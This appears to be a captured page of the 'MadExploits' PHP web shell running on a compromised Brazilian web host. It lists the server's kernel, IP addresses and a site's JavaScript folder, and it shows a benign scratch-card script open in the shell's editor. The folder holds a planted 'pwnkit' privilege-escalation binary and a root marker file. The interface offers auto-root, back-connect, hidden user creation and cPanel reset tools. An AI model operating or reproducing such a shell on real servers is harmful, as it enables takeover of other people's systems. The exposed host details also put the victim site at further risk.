Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
wwnova /
public_html /
aciport.com.br /
2022 /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootbox5.1
[ DIR ]
drwxr-xr-x
chosen
[ DIR ]
drwxr-xr-x
counterup
[ DIR ]
drwxr-xr-x
easing
[ DIR ]
drwxr-xr-x
jquery
[ DIR ]
drwxr-xr-x
lightbox
[ DIR ]
drwxr-xr-x
owlcarousel
[ DIR ]
drwxr-xr-x
popper
[ DIR ]
drwxr-xr-x
typed
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
funcoesDev.js
4.07
KB
-rw-r--r--
jquery.mask.js
18.77
KB
-rw-r--r--
main.js
3.51
KB
-rw-r--r--
procurarLojas.js
1.42
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
qrcode.js
499.92
KB
-rw-r--r--
rasgadinha.js
1.79
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rasgadinha.js
function Resetar() { var bridge = document.getElementById("bridge"), bridgeCanvas = bridge.getContext('2d'), brushRadius = (bridge.height / 100) * 10, img = new Image(); bridgeCanvas.globalCompositeOperation = 'source-over'; img.onload = function() { bridgeCanvas.drawImage(img, 0, 0, bridge.width, bridge.height); } img.loc = 'img/'; img.filename = 'img_raspinha3.jpg'; if (window.devicePixelRatio >= 2) { var nameParts = img.filename.split('.'); img.src = img.loc + img.filename; } else { img.src = img.loc + img.filename; } function detectLeftButton(event) { if ('buttons' in event) { return event.buttons === 1; } else if ('which' in event) { return event.which === 1; } else { return event.button === 1; } } function getBrushPos(xRef, yRef) { var bridgeRect = bridge.getBoundingClientRect(); return { x: Math.floor((xRef - bridgeRect.left) / (bridgeRect.right - bridgeRect.left) * bridge.width), y: Math.floor((yRef - bridgeRect.top) / (bridgeRect.bottom - bridgeRect.top) * bridge.height) }; } function drawDot(mouseX, mouseY) { bridgeCanvas.beginPath(); bridgeCanvas.arc(mouseX, mouseY, brushRadius, 0, 2 * Math.PI, true); bridgeCanvas.fillStyle = '#000'; bridgeCanvas.globalCompositeOperation = "destination-out"; bridgeCanvas.fill(); } bridge.addEventListener("mousemove", function(e) { var brushPos = getBrushPos(e.clientX, e.clientY); var leftBut = detectLeftButton(e); if (leftBut == 1) { drawDot(brushPos.x, brushPos.y); } }, false); bridge.addEventListener("touchmove", function(e) { var touch = e.targetTouches[0]; // console.log(touch); if (touch) { var brushPos = getBrushPos(touch.clientX, touch.clientY); drawDot(brushPos.x, brushPos.y); } e.preventDefault(); }, false); }
Close